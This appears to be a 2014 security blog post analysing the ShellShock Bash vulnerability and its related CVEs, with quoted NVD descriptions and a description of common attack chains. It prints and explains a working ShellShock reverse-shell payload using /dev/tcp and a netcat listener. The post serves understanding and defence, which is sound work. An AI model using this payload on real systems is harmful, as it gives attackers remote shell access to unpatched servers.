A Bash Vulnerability (aka ShellShock) has been published two months ago (CVE-2014-6271 original release date 09/24/2014) reaching the highest score for Impact and Exploitability by NIST-NVD with the following overview:
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka “ShellShock.” NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
The first patch released was partial and introduced another vulnerability (CVE-2014-7169 original release date 09/24/2014) again with top score for Impact and Exploitability by NIST-NVD with the following overview (highlight is mine):
GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271
Two months after, ShellShock is still on the wild, used to exploit thousands systems all around the net, installing php/perl/irc shell or any other malicious payload. This is possible because the original SehellShock vulnerability is now related to other five CVEs:
- CVE-2014-6271 (Initial report)
- CVE-2014-6277
- CVE-2014-6278
- CVE-2014-7169
- CVE-2014-7186
- CVE-2014-7187
The following image, taken from F5 Website, explain how ShellShock works and why it is very dangerous:
Basically,exploiting this vulnerability, you can run every command (or every commands sequence) , but in 90% of cases I found the final target as a shell installation, usually in five steps:
- Vulnerability exploiting
- Script (perl, bash, c, etc…) download from a remote site via wget, curl, etc…
- Script saving under /tmp
- Script execution
- Cleaning (remove /tmp original file)
In many cases this approach will fail because perl/php/c shell are detected and removed by security safeguards used to protect systems and remote sites could be blocked by Web Filtering policies. In recent days, however, I noticed a specific attack that does not use any malicious code, but only a system script:
() { ignored;};/bin/bash -i >& /dev/tcp/ip/port 0>&1
Let me explain better:
() { ignored;}; is the ShellShock exploit
/bin/bash -i is an interactive Bash session
>& /dev/tcp/ip/port redirect standard output and standard error to the remote host (i.e.: /dev/tcp/1.2.3.4/8080 redirect the bash session to IP 1.2.3.4 on TCP port 8080)
0>&1 read the satndard input. This should be 0<&1 but it works well in both cases
On the remote server a listener must be running: for testing I used nc -l 8080 (netcat listening on port 8080)
This is a very interesting approach about exploiting ShellShock getting a reverse shell 🙂